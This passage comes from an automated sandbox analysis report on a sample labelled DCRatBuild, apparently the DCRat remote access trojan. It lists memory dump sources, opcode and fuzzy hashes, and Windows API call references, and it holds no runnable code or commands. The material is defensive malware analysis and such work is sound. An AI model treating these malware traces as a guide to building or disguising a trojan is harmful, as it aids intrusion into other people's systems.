                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: ea206b4200fbea5cd9cd13c544e9a75607a577c9c6ca3aa22639585035233c12
                                      • Instruction ID: 7391f287b1b18d978e11d48f81fa105070cbd41c226e059c9e5567f7a8d98779
                                      • Opcode Fuzzy Hash: ea206b4200fbea5cd9cd13c544e9a75607a577c9c6ca3aa22639585035233c12
                                      • Instruction Fuzzy Hash: 89B012A226C4016C314C61046D26E76122CC5C2B31330401AB10ED00C1D4409E873932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: cf4c51665102fe405f5654b6253d46410986f58347a72a4a06dd31bcd8de06d1
                                      • Instruction ID: 64e45ef24f0c5fd927a62b4f35c8ba153925c36841caa24dbf59f3ee88fa4ef6
                                      • Opcode Fuzzy Hash: cf4c51665102fe405f5654b6253d46410986f58347a72a4a06dd31bcd8de06d1
                                      • Instruction Fuzzy Hash: 44B012A226C4016C314C61056C26E76122CC5C2B31330401AB10ED00C1D4409D863932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: b9c4320999b4ff6b96c17a34f7622a456bfe3f550535e50a16568ffdafb6c638
                                      • Instruction ID: 08161f02189185eda3cccc9a002548547dffb88ec9a6c8ed78263d053a224f61
                                      • Opcode Fuzzy Hash: b9c4320999b4ff6b96c17a34f7622a456bfe3f550535e50a16568ffdafb6c638
                                      • Instruction Fuzzy Hash: FEB012A226C5016D318C61046C26E76122CC5C2B31330411AB10ED00C1D4409DC63932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 13a4e0d88bfef0a1272467baaa8338a752d0b920d2ff31790424889b1d243046
                                      • Instruction ID: 6c5e310668fe80c01391d779ce465632d09951499ea02bad6aa7ea21ca5ac651
                                      • Opcode Fuzzy Hash: 13a4e0d88bfef0a1272467baaa8338a752d0b920d2ff31790424889b1d243046
                                      • Instruction Fuzzy Hash: 0AB012A226C4016C314C61046C26E76122CC5C3B31330801AB50ED00C1D4409D8A3932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 539f4596b72ebe3a968a34a8d440e25fdd69c7262890528d5c6b6b2092872f59
                                      • Instruction ID: 2f08fb3810d5c8a8f623607da33bbf8f6fd67b736e014a9081dc8972addbb78a
                                      • Opcode Fuzzy Hash: 539f4596b72ebe3a968a34a8d440e25fdd69c7262890528d5c6b6b2092872f59
                                      • Instruction Fuzzy Hash: 6CB012D227C5016D318C61046C26E76122CC5C2B31330811AB10AE01C1D4409CCB3832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 82e314a7e87781149fec6f02a1c3403d9bdb485aacc192d747e36b8954307844
                                      • Instruction ID: 78616d2e3fd8d692ee86e76aaff9770704e8831ea34d392711b021e061980a0d
                                      • Opcode Fuzzy Hash: 82e314a7e87781149fec6f02a1c3403d9bdb485aacc192d747e36b8954307844
                                      • Instruction Fuzzy Hash: CEB012D226C4016C314C61046D26E76122CC5C2B31330801AB10AE01C1D4509D8F3832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: d4309f24a314a2901c0e31a1f766b7db5d802606b2b24534448866d2a7508184
                                      • Instruction ID: 6890b7a85187537ab144c085bb831ee05ed6fc6b03e97cc288913ef03d8b4d0b
                                      • Opcode Fuzzy Hash: d4309f24a314a2901c0e31a1f766b7db5d802606b2b24534448866d2a7508184
                                      • Instruction Fuzzy Hash: 13B012D226C4016C314C61046C26E76122CC5C3B31330C01AB50AE01C1D4409C8B3832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: c4b34effc8dc2a0902126416f962e064eeac63cdbaf2272481a4f5a89575acea
                                      • Instruction ID: af82abbbea38f6db35b02d71ac89f3c4b5e9f07bd110c681b6e68bd800dc6136
                                      • Opcode Fuzzy Hash: c4b34effc8dc2a0902126416f962e064eeac63cdbaf2272481a4f5a89575acea
                                      • Instruction Fuzzy Hash: FBB0129626C5056C314C61046C66E7B122CE5C2B31330401AB10AD00C1D4409C863932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: eb71b5bd728c2588f1456b91113e05321bad5eb0b1b67eb11866fa47206a7b79
                                      • Instruction ID: f27a8370d3440017e738df5e1827c91769863891f49c59f0c91e2ce0ad1ea924
                                      • Opcode Fuzzy Hash: eb71b5bd728c2588f1456b91113e05321bad5eb0b1b67eb11866fa47206a7b79
                                      • Instruction Fuzzy Hash: 7DB0129626C7017D314C21006C76D7B122CC5C3B31330452AB10AE00C1D4409CCA7832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 49d2484d6a7aaf68964e062fd7184416f979f4743e18bcd29a5410ad8d363e10
                                      • Instruction ID: 68a045cd18ace14d2406c04a7927797167dd80c01be923a49511914ad89699d8
                                      • Opcode Fuzzy Hash: 49d2484d6a7aaf68964e062fd7184416f979f4743e18bcd29a5410ad8d363e10
                                      • Instruction Fuzzy Hash: D3B012A226D4016C314C61046E26E7612ACC5C2B31730401AB10AD00C1D5409DC73832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 1f8139af6460b496f37586d3679a05498fea6a41f092016b9bb4c8fd8a009a9f
                                      • Instruction ID: 04e5a1a82cce87d8dab123df13cef8872175eb5f7909c7e08eef5cd6f8d18e36
                                      • Opcode Fuzzy Hash: 1f8139af6460b496f37586d3679a05498fea6a41f092016b9bb4c8fd8a009a9f
                                      • Instruction Fuzzy Hash: 2FB0129227D4016C314C61046C66E76126DCAC2B31730401AB10AD00C1D4409C863832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: cccfd221a13ed33ab426e156498ccd27609ea28f2970b4075e165009196e0f7a
                                      • Instruction ID: 53fc65cef0b27fa7fed76f2754c0ec3226657d7ca9cb1c4546648b67bca3cd21
                                      • Opcode Fuzzy Hash: cccfd221a13ed33ab426e156498ccd27609ea28f2970b4075e165009196e0f7a
                                      • Instruction Fuzzy Hash: 4DB0129226D4016C314C61146D26E76126CC5C3B31330801AB60AD00C1D640DCC63832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: bf8aafbba10d2164003e522257ff2e5989d2b57ab5a6680d46654449bfd42bbe
                                      • Instruction ID: 7df9e4447cfacbcb5755eb14aad6eb65173ef9a3ae32e5c38c9f6a7da4836153
                                      • Opcode Fuzzy Hash: bf8aafbba10d2164003e522257ff2e5989d2b57ab5a6680d46654449bfd42bbe
                                      • Instruction Fuzzy Hash: 4AB012A226D5016D318C62046C66E76122DC6C2B31730411AB10AD00C1D4409CC63832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: b2dff8224fbaedde657ec3736f2d8df30a0cd0f456df853e760d67e3859a4475
                                      • Instruction ID: d4efeacf1d2643b2774f5782ad1a3b9def98c98af52a83f8ea90ce212e2f0723
                                      • Opcode Fuzzy Hash: b2dff8224fbaedde657ec3736f2d8df30a0cd0f456df853e760d67e3859a4475
                                      • Instruction Fuzzy Hash: D0B0129226D4016C314C61046C66E76122DC6C3B31730801AB50AD00C1D4409C863832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      APIs
                                        • Part of subcall function 00F2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F2B1A5,?), ref: 00F2AF46
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F2B1EA,?,00000000), ref: 00F2B3C4
                                      • GetCPInfo.KERNEL32(00000000,00F2B1EA,?,?,?,00F2B1EA,?,00000000), ref: 00F2B3D7
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: a3415a44990464b6a7062d2a80816c2b6dac05dcd12c1c3153269fbbd4e171f3
                                      • Instruction ID: 87793b97ef7dcf69b89741a1c9ff3f095bd5673fb238373a8d921b7d608abffc
                                      • Opcode Fuzzy Hash: a3415a44990464b6a7062d2a80816c2b6dac05dcd12c1c3153269fbbd4e171f3
                                      • Instruction Fuzzy Hash: BB515970D002259FDB20EF75E8C16BABBE5EF51320F18406ED8968B253D7399941FB91
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F06057: __EH_prolog.LIBCMT ref: 00F0605C
                                        • Part of subcall function 00F0C827: __EH_prolog.LIBCMT ref: 00F0C82C
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C86F
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C893
                                      • new.LIBCMT ref: 00F013FE
                                        • Part of subcall function 00F0B07D: __EH_prolog.LIBCMT ref: 00F0B082
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 5602340d1a98e1d5d7ae861ab15a9090be42a3c84761e75c3b80adcb498add3d
                                      • Instruction ID: 0bddb4e631bd6d72510828f0e61dc9e43ca131b3a4ce3c2dbe296f9947716dd1
                                      • Opcode Fuzzy Hash: 5602340d1a98e1d5d7ae861ab15a9090be42a3c84761e75c3b80adcb498add3d
                                      • Instruction Fuzzy Hash: E24136B0805B409EE724DF7988859E7FBE5FF18310F444A2ED6EE83282DB366558DB11
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F06057: __EH_prolog.LIBCMT ref: 00F0605C
                                        • Part of subcall function 00F0C827: __EH_prolog.LIBCMT ref: 00F0C82C
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C86F
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C893
                                      • new.LIBCMT ref: 00F013FE
                                        • Part of subcall function 00F0B07D: __EH_prolog.LIBCMT ref: 00F0B082
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 170e464dd93119925a7efb41907e30f9199b39cab49101f5aecb7c3e1a640dcb
